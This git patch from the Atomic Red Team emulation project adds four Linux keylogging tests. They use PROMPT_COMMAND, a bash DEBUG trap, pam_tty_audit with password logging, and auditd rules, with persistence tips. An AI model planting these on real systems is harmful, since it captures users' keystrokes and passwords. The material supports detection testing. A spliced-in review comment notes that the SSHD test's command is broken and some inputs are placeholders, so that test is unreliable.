From 9f9d549bf5b450fa25c1c4901babc5fbcf6be974 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Fri, 27 Aug 2021 15:36:59 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv | 8 +
 atomics/Indexes/Indexes-CSV/linux-index.csv | 8 +
 atomics/Indexes/Indexes-Markdown/index.md | 8 +
 .../Indexes/Indexes-Markdown/linux-index.md | 8 +
 atomics/Indexes/index.yaml | 284 ++++++++++++++++++
 atomics/T1056.001/T1056.001.md | 221 ++++++++++++++
 6 files changed, 537 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 48fab1bd..d4fe89f6 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -32,6 +32,10 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497
 credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
 credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
 credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
@@ -109,6 +113,10 @@ collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,
 collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index a87b19bb..539fcfdf 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -8,6 +8,10 @@ credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From L
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
@@ -26,6 +30,10 @@ collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single F
 collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
 collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
 collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index f02535b2..441c083d 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -59,6 +59,10 @@
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
 - Atomic Test #1: Input Capture [windows]
 - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
 - T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
 - Atomic Test #1: Dumping LSA Secrets [windows]
@@ -189,6 +193,10 @@
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
 - Atomic Test #1: Input Capture [windows]
 - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
 - T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
 - Atomic Test #1: Stage data from Discovery.bat [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index d8878c2a..6d926267 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -23,6 +23,10 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
 - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -83,6 +87,10 @@
 - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
 - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
 - [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
 - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 93d419bd..0f807a6d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -2688,6 +2688,148 @@ credential-access: sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth name: sh elevation_required: true + - name: Logging bash history to syslog + auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 + description: "There are several variables that can be set to control the appearance + of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents + of these variables are executed as if they had been typed on the command line. + The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable + and can be configured to write the latest \"bash history\" entries to the + syslog.\n\nTo gain persistence the command could be added to the users .bashrc + or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell and that logger + and tee are installed. + +' + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + +' + executor: + name: sh + elevation_required: true + command: | + PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' + echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" + tail /var/log/syslog + cleanup_command: 'unset PROMPT_COMMAND + +' + - name: Bash session based keylogger + auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 + description: "When a command is executed in bash, the BASH_COMMAND variable + contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\". 
+ The trap command is not a external command, but a built-in function of bash + and can be used in a script to run a bash function when some event occurs. + trap will detect when the BASH_COMMAND variable value changes and then pipe + that value into a file, creating a bash session based keylogger. \n\nTo gain + persistence the command could be added to the users .bashrc or .bash_aliases + or the systems default .bashrc in /etc/skel/ \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell + +' + prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** + Bash not running! *****\n"; exit 1; fi + +' + get_prereq_command: 'echo "" + +' + input_arguments: + output_file: + name: output_file + description: File to store captured commands + type: String + default: "/tmp/.keyboard.log" + executor: + name: command_prompt + elevation_required: false + command: | + trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG + echo "Hello World!" + cat #{output_file} + cleanup_command: 'rm #{output_file} + +' + - name: SSHD PAM keylogger + auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca + description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. + The Linux audit tool auditd can use the pam_tty_audit module to enable auditing + of TTY input and capture all keystrokes in a ssh session and place them in + the /var/log/audit/audit.log file after the session closes. + +' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires sshd and auditd + +' + prereq_command: | + if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi + if [ ! 
-x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + +' + input_arguments: + user_account: + description: Basic ssh user account for testing. + type: string + default: ubuntu + executor: + name: command_prompt + elevation_required: true + command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so + disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl + restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" + cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ + +' + - name: Auditd keylogger + auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af + description: "The linux audit tool auditd can be used to capture 32 and 64 bit + command execution and place the command in the /var/log/audit/audit.log audit + log. \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires sshd and auditd + +' + prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** + auditd NOT installed *****\n"; exit 1; fi + +' + get_prereq_command: 'echo "" + +' + input_arguments: + output_file: + description: description + type: type + default: default + executor: + name: command_prompt + elevation_required: true + command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl + -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start + $(date +\"%d/%m/%y %H:%M:%S\") \n" + cleanup_command: 'systemctl restart auditd + +' T1557.001: technique: external_references: 
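Review bot: In the `SSHD PAM keylogger` executor command, `echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd"` has the message and the redirection target swapped: it writes an empty line to a file literally named after the PAM directive in the working directory and never appends to /etc/pam.d/sshd, so the sshd/auditd restarts and the ssh session that follow run against an unchanged configuration and the test cannot demonstrate what its description claims. The intended line is `echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd`, which also makes the `cp -fv /tmp/sshd /etc/pam.d/` cleanup meaningful. The same text is repeated in the `collection:` copy of this hunk and in atomics/T1056.001/T1056.001.md, and since this commit is produced by the doc-generation job the correction belongs in the technique's source definition rather than in these index files. Two smaller points in the same hunk: the `Auditd keylogger` entry ships a placeholder `output_file` input (`description: description`, `type: type`, `default: default`) that its command never references and whose dependency text claims sshd is required while only auditd is checked, and the bash prereqs compare `$SHELL` (the user's login shell) rather than the interpreter actually running the test, so a check on `$BASH_VERSION` would be the reliable gate for the `trap ... DEBUG` and `PROMPT_COMMAND` behaviour these tests depend on.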
@@ -8325,6 +8467,148 @@ collection: sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth name: sh elevation_required: true + - name: Logging bash history to syslog + auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 + description: "There are several variables that can be set to control the appearance + of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents + of these variables are executed as if they had been typed on the command line. + The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable + and can be configured to write the latest \"bash history\" entries to the + syslog.\n\nTo gain persistence the command could be added to the users .bashrc + or .bash_aliases or the systems default .bashrc in /etc/skel/ \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell and that logger + and tee are installed. + +' + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + +' + executor: + name: sh + elevation_required: true + command: | + PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' + echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" + tail /var/log/syslog + cleanup_command: 'unset PROMPT_COMMAND + +' + - name: Bash session based keylogger + auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 + description: "When a command is executed in bash, the BASH_COMMAND variable + contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\". 
+ The trap command is not a external command, but a built-in function of bash + and can be used in a script to run a bash function when some event occurs. + trap will detect when the BASH_COMMAND variable value changes and then pipe + that value into a file, creating a bash session based keylogger. \n\nTo gain + persistence the command could be added to the users .bashrc or .bash_aliases + or the systems default .bashrc in /etc/skel/ \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires to be run in a bash shell + +' + prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** + Bash not running! *****\n"; exit 1; fi + +' + get_prereq_command: 'echo "" + +' + input_arguments: + output_file: + name: output_file + description: File to store captured commands + type: String + default: "/tmp/.keyboard.log" + executor: + name: command_prompt + elevation_required: false + command: | + trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG + echo "Hello World!" + cat #{output_file} + cleanup_command: 'rm #{output_file} + +' + - name: SSHD PAM keylogger + auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca + description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. + The Linux audit tool auditd can use the pam_tty_audit module to enable auditing + of TTY input and capture all keystrokes in a ssh session and place them in + the /var/log/audit/audit.log file after the session closes. + +' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires sshd and auditd + +' + prereq_command: | + if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi + if [ ! 
-x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: 'echo "" + +' + input_arguments: + user_account: + description: Basic ssh user account for testing. + type: string + default: ubuntu + executor: + name: command_prompt + elevation_required: true + command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so + disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl + restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" + cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ + +' + - name: Auditd keylogger + auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af + description: "The linux audit tool auditd can be used to capture 32 and 64 bit + command execution and place the command in the /var/log/audit/audit.log audit + log. \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'This test requires sshd and auditd + +' + prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** + auditd NOT installed *****\n"; exit 1; fi + +' + get_prereq_command: 'echo "" + +' + input_arguments: + output_file: + description: description + type: type + default: default + executor: + name: command_prompt + elevation_required: true + command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl + -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start + $(date +\"%d/%m/%y %H:%M:%S\") \n" + cleanup_command: 'systemctl restart auditd + +' T1557.001: technique: external_references: diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index 88c11054..72a6bc3e 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md 
@@ -16,6 +16,14 @@ Keylogging is the most prevalent type of input capture, with many different ways - [Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d](#atomic-test-2---living-off-the-land-terminal-input-capture-on-linux-with-pamd) +- [Atomic Test #3 - Logging bash history to syslog](#atomic-test-3---logging-bash-history-to-syslog) + +- [Atomic Test #4 - Bash session based keylogger](#atomic-test-4---bash-session-based-keylogger) + +- [Atomic Test #5 - SSHD PAM keylogger](#atomic-test-5---sshd-pam-keylogger) + +- [Atomic Test #6 - Auditd keylogger](#atomic-test-6---auditd-keylogger) +
@@ -107,4 +115,217 @@ echo "Sorry, you must install module pam_tty_audit.so and recompile, for this te +
+
+ +## Atomic Test #3 - Logging bash history to syslog +There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog. + +To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ + +**Supported Platforms:** Linux + + +**auto_generated_guid:** 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 + + + + + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' +echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" +tail /var/log/syslog +``` + +#### Cleanup Commands: +```sh +unset PROMPT_COMMAND +``` + + + +#### Dependencies: Run with `sh`! +##### Description: This test requires to be run in a bash shell and that logger and tee are installed. +##### Check Prereq Commands: +```sh +if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi +if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi +if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi +``` +##### Get Prereq Commands: +```sh +echo "" +``` + + + + +
+
+ +## Atomic Test #4 - Bash session based keylogger +When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. + +To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ + +**Supported Platforms:** Linux + + +**auto_generated_guid:** 7f85a946-a0ea-48aa-b6ac-8ff539278258 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | File to store captured commands | String | /tmp/.keyboard.log| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG +echo "Hello World!" +cat #{output_file} +``` + +#### Cleanup Commands: +```cmd +rm #{output_file} +``` + + + +#### Dependencies: Run with `sh`! +##### Description: This test requires to be run in a bash shell +##### Check Prereq Commands: +```sh +if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi +``` +##### Get Prereq Commands: +```sh +echo "" +``` + + + + +
+
+ +## Atomic Test #5 - SSHD PAM keylogger +Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. + +**Supported Platforms:** Linux + + +**auto_generated_guid:** 81d7d2ad-d644-4b6a-bea7-28ffe43becca + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| user_account | Basic ssh user account for testing. | string | ubuntu| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +cp -v /etc/pam.d/sshd /tmp/ +echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" +systemctl restart sshd +systemctl restart auditd +ssh #{user_account}@localhost +whoami +sudo su +whoami +exit +exit +``` + +#### Cleanup Commands: +```cmd +cp -fv /tmp/sshd /etc/pam.d/ +``` + + + +#### Dependencies: Run with `sh`! +##### Description: This test requires sshd and auditd +##### Check Prereq Commands: +```sh +if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi +if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi +``` +##### Get Prereq Commands: +```sh +echo "" +``` + + + + +
+
+ +## Atomic Test #6 - Auditd keylogger +The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. + +**Supported Platforms:** Linux + + +**auto_generated_guid:** a668edb9-334e-48eb-8c2e-5413a40867af + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | description | type | default| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +auditctl -a always,exit -F arch=b64 -S execve -k CMDS +auditctl -a always,exit -F arch=b32 -S execve -k CMDS +whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") +``` + +#### Cleanup Commands: +```cmd +systemctl restart auditd +``` + + + +#### Dependencies: Run with `sh`! +##### Description: This test requires sshd and auditd +##### Check Prereq Commands: +```sh +if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi +``` +##### Get Prereq Commands: +```sh +echo "" +``` + + + +